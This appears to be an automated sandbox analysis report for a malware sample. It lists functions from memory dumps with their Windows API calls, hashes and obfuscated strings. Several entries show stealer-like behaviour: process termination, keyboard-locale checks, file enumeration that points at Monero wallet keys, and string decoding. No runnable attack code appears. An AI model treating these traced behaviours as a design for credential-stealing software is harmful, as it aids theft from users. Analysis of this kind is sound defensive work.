                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 85918d0ecd3a156dde31c3b380f4d36db75dc9b30edb9c0355e0a9581e2035eb
                                        • Instruction ID: fbf9f92416f94c5d74018236a69b7ddead73b8cf65b1a6dc3a1f8b0a2825684d
                                        • Opcode Fuzzy Hash: 85918d0ecd3a156dde31c3b380f4d36db75dc9b30edb9c0355e0a9581e2035eb
                                        • Instruction Fuzzy Hash: 1911EC79A04218EBDB24EFA4DC48BEDB7B9BB49701F00468CF509A6240DB759A84CF90
                                        Function 00DCBD28 Relevance: 11.7, Strings: 8, Instructions: 1668COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #4LI$.iW$6S?\$M.?}$`o]$j{?$x^=_$c;
                                        • API String ID: 0-2911940995
                                        • Opcode ID: 758b122e6a2ea9e6b0085145d0b142317ec9d316d92190ad9b9dca9427446128
                                        • Instruction ID: fae2426060be4d686ab226e30124dbb95c2c6285ea6f20a24d927033921b51a4
                                        • Opcode Fuzzy Hash: 758b122e6a2ea9e6b0085145d0b142317ec9d316d92190ad9b9dca9427446128
                                        • Instruction Fuzzy Hash: 7FB238F3A0C2149FE3046E2DEC8567AFBE9EF94720F16463DEAC4C3744E93598058696
                                        Function 00DD9274 Relevance: 11.6, Strings: 8, Instructions: 1636COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 7vUw$ZNuz$aSOo$fc~$g-|$4p-$Fe~$~]
                                        • API String ID: 0-472717041
                                        • Opcode ID: cb47f218f7eb69330a95ae2c58dbb51536e4c7cb7898585fe52bf4c7ac73a325
                                        • Instruction ID: e445763578a6158ec6502e07314a133fe69b1a85cc41e2fd16a730a30c881d24
                                        • Opcode Fuzzy Hash: cb47f218f7eb69330a95ae2c58dbb51536e4c7cb7898585fe52bf4c7ac73a325
                                        • Instruction Fuzzy Hash: 5FB2F7F360C204AFE3046E2DEC8567AFBE9EFD4720F1A492DE6C5C7744EA3558018696
                                        Function 00987D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • GetKeyboardLayoutList.USER32(00000000,00000000,009905B7), ref: 00987D71
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00987D89
                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00987D9D
                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00987DF2
                                        • LocalFree.KERNEL32(00000000), ref: 00987EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                        • String ID: /
                                        • API String ID: 3090951853-4001269591
                                        • Opcode ID: 9c06c01e084eb034824deb18236bbfb3de0774b4e195b83c33bda48a090b3088
                                        • Instruction ID: 00406f53293b99a570cd1fd7881e3bf37d63a8146dd51f5cadc99e42d724f75e
                                        • Opcode Fuzzy Hash: 9c06c01e084eb034824deb18236bbfb3de0774b4e195b83c33bda48a090b3088
                                        • Instruction Fuzzy Hash: D9413E71940218ABDB24EF94DC99BEEB778FF94700F2045D9E00A66291DB786F84CF61
                                        Function 0097E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00990D79), ref: 0097E5A2
                                        • StrCmpCA.SHLWAPI(?,009915F0), ref: 0097E5F2
                                        • StrCmpCA.SHLWAPI(?,009915F4), ref: 0097E608
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097ECDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 433455689-1173974218
                                        • Opcode ID: ad223ec6b7fb524d6d71d4bbf61a566a8e8fd1fe2a294db0663e07a41bdc092d
                                        • Instruction ID: d4ddb7e875e5a88a2d307f371a257215a97735250898083eeb5c4f8ac4dac527
                                        • Opcode Fuzzy Hash: ad223ec6b7fb524d6d71d4bbf61a566a8e8fd1fe2a294db0663e07a41bdc092d
                                        • Instruction Fuzzy Hash: 1012E2729101189BDB18FB60DDA6FED7379BFD4300F4045EAB50A66291EF386B48CB52
                                        Function 00DCA114 Relevance: 9.2, Strings: 6, Instructions: 1724COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: =R~$ =R~$2Tm7$L]mo$elem$y @m
                                        • API String ID: 0-489510652
                                        • Opcode ID: b0995b0d304f654025e81615e0d3b8fef5a229005e837e919216905471d4f0d2
                                        • Instruction ID: f570abdc1a7b4e6d542a03ca8d07b446a8f4a3e2676ea1a17257c45218db7ca1
                                        • Opcode Fuzzy Hash: b0995b0d304f654025e81615e0d3b8fef5a229005e837e919216905471d4f0d2
                                        • Instruction Fuzzy Hash: F4B238F3A0C2049FE308AE2DEC8577AB7D9EBD4720F1A463DEAC5C7744E97558018692
                                        Function 00DD7962 Relevance: 9.0, Strings: 6, Instructions: 1540COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: :5t$:kOz$M]}?$V'7;$WykV$sr_3
                                        • API String ID: 0-2097001790
                                        • Opcode ID: 3959baa07f08f4cafb0e94a1df14edf93a3c603847d71f937e416c04ca2b0871
                                        • Instruction ID: ef08ed1dcb85c3745aca0ddb6e0d224f83ccb3f334841e6f4b120bb06d58e255
                                        • Opcode Fuzzy Hash: 3959baa07f08f4cafb0e94a1df14edf93a3c603847d71f937e416c04ca2b0871
                                        • Instruction Fuzzy Hash: CFA23AF3A08214AFE3046E2DEC4567ABBE9EF94720F16853DEAC4C3744E63598058797
                                        Function 00DC6C03 Relevance: 7.9, Strings: 5, Instructions: 1642COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ,'<O$C*|?$Uym/$tKu$r|
                                        • API String ID: 0-3904002088
                                        • Opcode ID: e569ac3a2a7e66ebe699f3c42123f99b7b47ecaf0c25c54cbe52204d91d573f1
                                        • Instruction ID: 474d9f2de51a16c2ddee10f6cae995c1b4b4fcda53a47baa253f1814a1524cdb
                                        • Opcode Fuzzy Hash: e569ac3a2a7e66ebe699f3c42123f99b7b47ecaf0c25c54cbe52204d91d573f1
                                        • Instruction Fuzzy Hash: 58B24AF3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC487744EA3558058697
                                        Function 00DCD8B7 Relevance: 7.9, Strings: 5, Instructions: 1603COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: %qcw$7~o$=^^_$G&X>$u7(
                                        • API String ID: 0-1545840563
                                        • Opcode ID: 3fcdc3456250f4aee2492c911c09fb53143f467e75c82138f7bf21346e7e3838
                                        • Instruction ID: 327a037e50965ce88add4b2ebc521414a031aa495fe69cee933e449580877dd3
                                        • Opcode Fuzzy Hash: 3fcdc3456250f4aee2492c911c09fb53143f467e75c82138f7bf21346e7e3838
                                        • Instruction Fuzzy Hash: CBB215F360C2049FE314AE29EC8577ABBE9EF94320F1A453DEAC4C3744EA3558058697
                                        Function 009DF8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: \u$\u${${$}$}
                                        • API String ID: 0-582841131
                                        • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction ID: ed488fff415de4a271605bd681a1fbdd1f794b114f5094fd1cc195f7254276fc
                                        • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                        • Instruction Fuzzy Hash: BA416B12E09BC9C5CB058B7444B12AEBFB22FD6210F6D82EBC49E1F382C774414AD3A5
                                        Function 0097C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0097C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0097C97C
                                        • lstrcat.KERNEL32(?,00990B47), ref: 0097CA43
                                        • lstrcat.KERNEL32(?,00990B4B), ref: 0097CA57
                                        • lstrcat.KERNEL32(?,00990B4E), ref: 0097CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 0f14b6ceaa9ffb76e90082583d6df1354cf5d86b4b6ef2f54a3f6b38b4eec014
                                        • Instruction ID: ba0e251b111eff55e1f83966e123b7c20d5327686d5f76cae5bbf9a35c93c335
                                        • Opcode Fuzzy Hash: 0f14b6ceaa9ffb76e90082583d6df1354cf5d86b4b6ef2f54a3f6b38b4eec014
